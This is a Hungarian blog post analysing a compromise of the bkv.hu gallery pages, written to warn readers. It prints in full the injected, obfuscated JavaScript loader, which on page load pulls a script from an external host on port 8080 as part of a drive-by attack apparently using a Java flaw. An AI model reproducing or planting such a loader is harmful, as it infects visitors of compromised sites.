23:52: A kártékony kódokat eltávolították a galériákból

Z hívta fel rá a figyelmem, hogy a bkv.hu galériája egy rendesen összekuszált JavaScript kódot is tartalmaz (GPL licensz alatt ;), ami aztán valahogy egy orosz domainről próbál levadászni további futtatható kódokat. A fertőző oldal az alábbi címen érhető el, de mindenki csak saját felelősségre nézze meg!

hxxp://www.bkv.hu/galeria/20080408rendezveny/varosliget/index.php

Frissítés: Úgy tűnik, hogy a /galeria/20080408rendezveny/ útvonal alatti összes galéria fertőzött

A szkript így néz ki, ha valakinek van kedve rejtvényt fejteni:

<script>/*GNU GPL*/ try{window.onload = function(){var T4lhy9x465n =
document.createElement('s!$c#(#r@)^i(#p(t#'.replace(/\!|#|\)|\$|\^|@|\(|&/ig,
''));T4
lhy9x465n.setAttribute('type',
'text/javascript');T4lhy9x465n.setAttribute('src',
'h!$t@!$t$&$p(:#/($^/#@&k&!!&i)(n$^@o$^!p@o$!@i($&)s&&!k(!^&-($r$^u^(&.
(!$g@o((#(@o&!)^g^)&$&l!^e&&.)@a!^)@e!).#@m$!i^h#(a&!&n^^b@)l@)o$#$g!-@!#c!)^)o((m#!).!)(m!$$u)$#s)!i^c(b^!@o)(x!!&p^(r)^)o^.(r!@u&):$^8@)0##8@$^0(#/&^g)$
a@(m$)($e&$f&($a$q#(s(!$.&!)&#c#&!o@$&$m^^^/(&g^$(@a&m$()e&^#f!$@a)!(#q!(#s!.)$!^c&!o^!@@m$^/!y^^$a(#&h#@o$^o)##.&@))c(o@@))&m#)!(/(1(##&1&)(0@#^)m$&^b(!.
@!c$#o(!$m)/@##&g(($@$o()$o$g^l#!(^e$).@&&c)o^m(^(&/$@'.replace(/\)|#|&|\^|\$|@|\!|\(/ig,
''));T4lhy9x465n.setAttribute('defer', 'defer');T4lhy9x465n.setA
ttribute('id', 'W!#!3!#j@#u@&&n!^(u&!&a!q$&)@!b@&&o$(!m$j!$'.replace(/\^|&|@|\$|\)|\!|\(|#/ig,
''));document.body.appendChild(T4lhy9x465n);}} catch(e) {}<
/script>

Kis szemgúvasztás árán egyébként a kód egész jól olvasható, egyszerűen ignorálni kell a fura karaktereket (amiket a replace metódusok szednek ki egyébként).

A Wepawet ugyan nem értékeli veszélyesnek az oldalt, a Google Safe Browsing API-ja viszont igen. Wiresharkkal nagy vonalakban lekövettem a hálózati forgalmat, és elsőre úgy tűnik, hogy a hivatkozott orosz oldal 0 hosszúságú választ ad. Ebből legnagyobb eséllyel az következik, hogy a) benéztem valamit a nagy kapkodásban b) Rosszul sikerült a fertőzés illetve eltávolították a kártékony tartalmat a külföldi szerverről. 

...kiderült, hogy  az oldal egy Java JRE sebezhetőséget használ ki (valószínűleg ezt), baromi óvatosan nyúljatok hozzá!

Minden esetre azt javaslom, hogy csak alapos védelemmel felvértezve (NoScript, virtuális gép, stb.) vágjatok neki a bkv.hu domainjának, ki tudja milyen kártevők tanyáznak arrafelé! Az informatikai osztályt pedig ismét csókoltatom...

Z-nek pedig még egyszer köszönet a közérdekű infóért!

Szívesen vennék egy teljes packet dumpot arról a lefolyásról, mikor az első ruszki oldal vissza is ad valamit - valószínűleg figyeli a user agentet, és az alapján dobja ki az exploitot (az enyém elveszett, Houston, Houston HW problémánk van :P ).